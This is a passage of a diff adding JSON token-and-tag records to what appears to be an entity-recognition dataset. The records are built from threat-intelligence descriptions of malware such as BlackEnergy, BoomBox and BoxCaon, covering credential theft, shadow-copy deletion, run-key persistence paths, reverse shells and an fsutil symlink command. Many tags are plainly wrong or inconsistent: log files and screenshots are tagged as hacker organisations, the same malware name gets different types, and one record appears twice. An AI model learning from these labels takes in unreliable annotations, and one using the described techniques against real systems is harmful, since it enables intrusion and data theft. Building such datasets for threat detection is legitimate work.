"on", + "a", + "compromised", + "network", + "with", + "the", + "use", + "of", + "`cmd.exe`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "BlackCat", + "can", + "use", + "Windows", + "commands", + "such", + "as", + "`fsutil", + "behavior", + "set", + "SymLinkEvaluation", + "R2L:1`", + "to", + "redirect", + "file", + "system", + "access", + "to", + "a", + "different", + "location", + "after", + "gaining", + "access", + "into", + "compromised", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackCat", + "can", + "use", + "`wmic.exe`", + "to", + "delete", + "shadow", + "copies", + "on", + "compromised", + "networks." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackEnergy", + "attempts", + "to", + "bypass", + "default", + "User", + "Access", + "Control", + "(UAC)", + "settings", + "by", + "exploiting", + "a", + "backward-compatibility", + "setting", + "found", + "in", + "Windows", + "7", + "and", + "later." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "BlackEnergy", + "component", + "KillDisk", + "is", + "capable", + "of", + "deleting", + "Windows", + "Event", + "Logs." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "BlackEnergy", + "has", + "enabled", + "the", + "<code>TESTSIGNING</code>", + "boot", + "configuration", + "option", + "to", + "facilitate", + "loading", + "of", + "a", + "driver", + "component." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackEnergy", + "has", + "used", + "a", + "plug-in", + "to", + "gather", + "credentials", + "stored", + "in", + "files", + "on", + "the", + "host", + "by", + "various", + "software", + "programs,", + "including", + "The", + "Bat!", + "email", + "client,", + "Outlook,", + "and", + "Windows", + "Credential", + "Store." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackEnergy", + "has", + "used", + "a", + "plug-in", + "to", + "gather", + "credentials", + "from", + "web", + "browsers", + "including", + "FireFox,", + "Google", + "Chrome,", + "and", + "Internet", + "Explorer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "BlackEnergy", + "2", + "contains", + "a", + "\"Destroy\"", + "plug-in", + "that", + "destroys", + "data", + "stored", + "on", + "victim", + "hard", + "drives", + "by", + "overwriting", + "file", + "contents." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackEnergy", + "injects", + "its", + "DLL", + "component", + "into", + "svchost.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BlackEnergy", + "has", + "the", + "capability", + "to", + "communicate", + "over", + "a", + "backup", + "channel", + "via", + "plus.google.com." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackEnergy", + "gathers", + "a", + "list", + "of", + "installed", + "apps", + "from", + "the", + "uninstall", + "program", + "Registry.", + "It", + "also", + "gathers", + "registered", + "mail,", + "browser,", + "and", + "instant", + "messaging", + "clients", + "from", + "the", + "Registry.", + "BlackEnergy", + "has", + "searched", + "for", + "given", + "file", + "types." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackEnergy", + "has", + "removed", + "the", + "watermark", + "associated", + "with", + "enabling", + "the", + "<code>TESTSIGNING</code>", + "boot", + "configuration", + "option", + "by", + "removing", + "the", + "relevant", + "strings", + "in", + "the", + "<code>user32.dll.mui</code>", + "of", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackEnergy", + "has", + "run", + "a", + "keylogger", + "plug-in", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackEnergy", + "has", + "conducted", + "port", + "scans", + "on", + "a", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackEnergy", + "can", + "gather", + "very", + "specific", + "information", + "about", + "attached", + "USB", + "devices,", + "to", + "include", + "device", + "instance", + "ID", + "and", + "drive", + "geometry." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackEnergy", + "has", + "gathered", + "a", + "process", + "list", + "by", + "using", + "Tasklist.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "The", + "BlackEnergy", + "3", + "variant", + "drops", + "its", + "main", + "DLL", + "component", + "and", + "then", + "creates", + "a", + ".lnk", + "shortcut", + "to", + "that", + "file", + "in", + "the", + "startup", + "folder." + ], + "ner_tags": [ + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackEnergy", + "has", + "run", + "a", + "plug-in", + "on", + "a", + "victim", + "to", + "spread", + "through", + "the", + "local", + "network", + "by", + "using", + "PsExec", + "and", + "accessing", + "admin", + "shares." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackEnergy", + "is", + "capable", + "of", + "taking", + "screenshots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "One", + "variant", + "of", + "BlackEnergy", + "locates", + "existing", + "driver", + "services", + "that", + "have", + "been", + "disabled", + "and", + "drops", + "its", + "driver", + "component", + "into", + "one", + "of", + "those", + "service's", + "paths,", + "replacing", + "the", + "legitimate", + "executable.", + "The", + "malware", + "then", + "sets", + "the", + "hijacked", + "service", + "to", + "start", + "automatically", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "BlackEnergy", + "3", + "variant", + "drops", + "its", + "main", + "DLL", + "component", + "and", + "then", + "creates", + "a", + ".lnk", + "shortcut", + "to", + "that", + "file", + "in", + "the", + "startup", + "folder." + ], + "ner_tags": [ + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackEnergy", + "has", + "used", + "Systeminfo", + "to", + "gather", + "the", + "OS", + "version,", + "as", + "well", + "as", + "information", + "on", + "the", + "system", + "configuration,", + "BIOS,", + "the", + "motherboard,", + "and", + "the", + "processor." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackEnergy", + "has", + "gathered", + "information", + "about", + "network", + "IP", + "configurations", + "using", + "ipconfig.exe", + "and", + "about", + "routing", + "tables", + "using", + "route.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "BlackEnergy", + "has", + "gathered", + "information", + "about", + "local", + "network", + "connections", + "using", + "netstat." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BlackEnergy", + "communicates", + "with", + "its", + "C2", + "server", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "A", + "BlackEnergy", + "2", + "plug-in", + "uses", + "WMI", + "to", + "gather", + "victim", + "host", + "details." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "One", + "variant", + "of", + "BlackEnergy", + "creates", + "a", + "new", + "service", + "using", + "either", + "a", + "hard-coded", + "or", + "randomly", + "generated", + "name." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackMould", + "can", + "copy", + "files", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackMould", + "has", + "the", + "ability", + "to", + "find", + "files", + "on", + "the", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackMould", + "has", + "the", + "ability", + "to", + "download", + "files", + "to", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackMould", + "can", + "enumerate", + "local", + "drives", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackMould", + "can", + "send", + "commands", + "to", + "C2", + "in", + "the", + "body", + "of", + "HTTP", + "POST", + "requests." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackMould", + "can", + "run", + "cmd.exe", + "with", + "parameters." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "BloodHound", + "can", + "compress", + "data", + "collected", + "by", + "its", + "SharpHound", + "ingestor", + "into", + "a", + "ZIP", + "file", + "to", + "be", + "written", + "to", + "disk." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BloodHound", + "can", + "collect", + "information", + "about", + "domain", + "users,", + "including", + "identification", + "of", + "domain", + "admin", + "accounts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BloodHound", + "can", + "collect", + "information", + "about", + "domain", + "groups", + "and", + "members." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BloodHound", + "has", + "the", + "ability", + "to", + "map", + "domain", + "trusts", + "and", + "identify", + "misconfigurations", + "for", + "potential", + "abuse." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BloodHound", + "has", + "the", + "ability", + "to", + "collect", + "local", + "admin", + "information", + "via", + "GPO." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-HackOrg", + "B-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BloodHound", + "can", + "identify", + "users", + "with", + "local", + "administrator", + "rights." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BloodHound", + "can", + "collect", + "information", + "about", + "local", + "groups", + "and", + "members." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BloodHound", + "can", + "use", + ".NET", + "API", + "calls", + "in", + "the", + "SharpHound", + "ingestor", + "component", + "to", + "pull", + "Active", + "Directory", + "data." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BloodHound", + "can", + "collect", + "password", + "policy", + "information", + "on", + "the", + "target", + "environment." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BloodHound", + "can", + "use", + "PowerShell", + "to", + "pull", + "Active", + "Directory", + "information", + "from", + "the", + "target", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BloodHound", + "can", + "enumerate", + "and", + "collect", + "the", + "properties", + "of", + "domain", + "computers,", + "including", + "domain", + "controllers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BloodHound", + "can", + "collect", + "information", + "on", + "user", + "sessions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bonadan", + "can", + "create", + "bind", + "and", + "reverse", + "shells", + "on", + "the", + "infected", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bonadan", + "has", + "maliciously", + "altered", + "the", + "OpenSSH", + "binary", + "on", + "targeted", + "systems", + "to", + "create", + "a", + "backdoor." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bonadan", + "can", + "download", + "additional", + "modules", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bonadan", + "can", + "use", + "the", + "<code>ps</code>", + "command", + "to", + "discover", + "other", + "cryptocurrency", + "miners", + "active", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bonadan", + "can", + "download", + "an", + "additional", + "module", + "which", + "has", + "a", + "cryptocurrency", + "mining", + "extension." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bonadan", + "can", + "XOR-encrypt", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Bonadan", + "has", + "discovered", + "the", + "OS", + "version,", + "CPU", + "model,", + "and", + "RAM", + "size", + "of", + "the", + "system", + "it", + "has", + "been", + "installed", + "on." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bonadan", + "can", + "find", + "the", + "external", + "IP", + "address", + "of", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Bonadan", + "has", + "discovered", + "the", + "username", + "of", + "the", + "user", + "running", + "the", + "backdoor." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoomBox", + "can", + "decrypt", + "AES-encrypted", + "files", + "downloaded", + "from", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoomBox", + "has", + "the", + "ability", + "to", + "execute", + "an", + "LDAP", + "query", + "to", + "enumerate", + "the", + "distinguished", + "name,", + "SAM", + "account", + "name,", + "and", + "display", + "name", + "for", + "all", + "domain", + "users." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoomBox", + "can", + "execute", + "an", + "LDAP", + "query", + "to", + "discover", + "e-mail", + "accounts", + "for", + "domain", + "users." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Org", + "O" + ] + }, + { + "tokens": [ + "BoomBox", + "can", + "check", + "its", + "current", + "working", + "directory", + "and", + "for", + "the", + "presence", + "of", + "a", + "specific", + "file", + "and", + "terminate", + "if", + "specific", + "values", + "are", + "not", + "found." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoomBox", + "can", + "upload", + "data", + "to", + "dedicated", + "per-victim", + "folders", + "in", + "Dropbox." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BoomBox", + "can", + "search", + "for", + "specific", + "files", + "and", + "directories", + "on", + "a", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoomBox", + "has", + "the", + "ability", + "to", + "download", + "next", + "stage", + "malware", + "components", + "to", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoomBox", + "has", + "gained", + "execution", + "through", + "user", + "interaction", + "with", + "a", + "malicious", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "BoomBox", + "has", + "the", + "ability", + "to", + "mask", + "malicious", + "data", + "strings", + "as", + "PDF", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "I-Features", + "I-Features", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "BoomBox", + "can", + "encrypt", + "data", + "using", + "AES", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoomBox", + "can", + "establish", + "persistence", + "by", + "writing", + "the", + "Registry", + "value", + "<code>MicroNativeCacheSvc</code>", + "to", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "BoomBox", + "can", + "use", + "RunDLL32", + "for", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "BoomBox", + "can", + "enumerate", + "the", + "hostname,", + "domain,", + "and", + "IP", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoomBox", + "can", + "enumerate", + "the", + "username", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoomBox", + "has", + "used", + "HTTP", + "POST", + "requests", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoomBox", + "can", + "download", + "files", + "from", + "Dropbox", + "using", + "a", + "hardcoded", + "access", + "token." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoxCaon", + "has", + "used", + "DropBox", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoxCaon", + "established", + "persistence", + "by", + "setting", + "the", + "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows", + "NT\\CurrentVersion\\Windows\\load</code>", + "registry", + "key", + "to", + "point", + "to", + "its", + "executable." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoxCaon", + "can", + "upload", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoxCaon", + "uploads", + "files", + "and", + "data", + "from", + "a", + "compromised", + "host", + "over", + "the", + "existing", + "C2", + "channel." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoxCaon", + "has", + "the", + "capability", + "to", + "download", + "folders'", + "contents", + "on", + "the", + "system", + "and", + "upload", + "the", + "results", + "back", + "to", + "its", + "Dropbox", + "drive." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoxCaon", + "has", + "searched", + "for", + "files", + "on", + "the", + "system,", + "such", + "as", + "documents", + "located", + "in", + "the", + "desktop", + "folder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoxCaon", + "can", + "download", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "BoxCaon", + "has", + "created", + "a", + "working", + "folder", + "for", + "collected", + "files", + "that", + "it", + "sends", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoxCaon", + "has", + "used", + "Windows", + "API", + "calls", + "to", + "obtain", + "information", + "about", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoxCaon", + "used", + "the", + "\"StackStrings\"", + "obfuscation", + "technique", + "to", + "hide", + "malicious", + "functionalities." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoxCaon", + "can", + "collect", + "the", + "victim's", + "MAC", + "address", + "by", + "using", + "the", + "<code>GetAdaptersInfo</code>", + "API." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BoxCaon", + "can", + "execute", + "arbitrary", + "commands", + "and", + "utilize", + "the", + "\"ComSpec\"", + "environment", + "variable." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Brave", + "Prince", + "terminates", + "antimalware", + "processes." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "Brave", + "Prince", + "variants", + "have", + "used", + "South", + "Korea's", + "Daum", + "email", + "service", + "to", + "exfiltrate", + "information,", + "and", + "later", + "variants", + "have", + "posted", + "the", + "data", + "to", + "a", + "web", + "server", + "via", + "an", + "HTTP", + "post", + "command." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "I-Area", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Brave", + "Prince", + "gathers", + "file", + "and", + "directory", + "information", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brave", + "Prince", + "lists", + "the", + "running", + "processes." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brave", + "Prince", + "gathers", + "information", + "about", + "the", + "Registry." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brave", + "Prince", + "collects", + "hard", + "drive", + "content", + "and", + "system", + "configuration", + "information." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Brave", + "Prince", + "gathers", + "network", + "configuration", + "information", + "as", + "well", + "as", + "the", + "ARP", + "cache." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Briba", + "downloads", + "files", + "onto", + "infected", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Briba", + "creates", + "run", + "key", + "Registry", + "entries", + "pointing", + "to", + "malicious", + "DLLs", + "dropped", + "to", + "disk." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Briba", + "uses", + "rundll32", + "within", + "Registry", + "Run", + "Keys", + "/", + "Startup", + "Folder", + "entries", + "to", + "execute", + "malicious", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", 